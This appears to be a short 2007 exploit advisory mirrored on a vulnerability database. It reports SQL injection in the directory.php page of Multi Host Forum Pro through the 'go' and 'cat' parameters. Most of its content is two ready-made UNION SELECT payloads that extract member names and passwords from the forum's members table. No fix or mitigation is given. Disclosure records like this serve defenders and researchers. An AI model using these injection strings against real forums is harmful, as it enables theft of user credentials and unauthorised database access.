Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18294
HistoryOct 26, 2007 - 12:00 a.m.

Multi Host Forum Pro phpbb & ipb Multiple Sql Injection

2007-10-2600:00:00
vulners.com
52


/_ | ____ |\___ \ / | / |/ |
| |/ \ | | (
<_/ \ \ ______ | \ \
| | | \ | |/ \ \
| | /
/ | || |
||| /\| /____ /\___ >| ||||
\/\
_____| \/ \/

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org


Multi Host Forum Pro phpbb & ipb Multiple Sql Injection


Discovered by KiNgOfThEwOrLd


Corrupted Page: directory.php
Corrupted Variable: ?go=
PoC: An attacker can get some infos from your database. The query result, may be a cookie value.

Exploit: directory.php?go=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id]


Corrupted Page: directory.php
Corrupted Variable: ?cat=
PoC: An attacker can get some infos from your database.

Exploit: directory.php?cat=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id]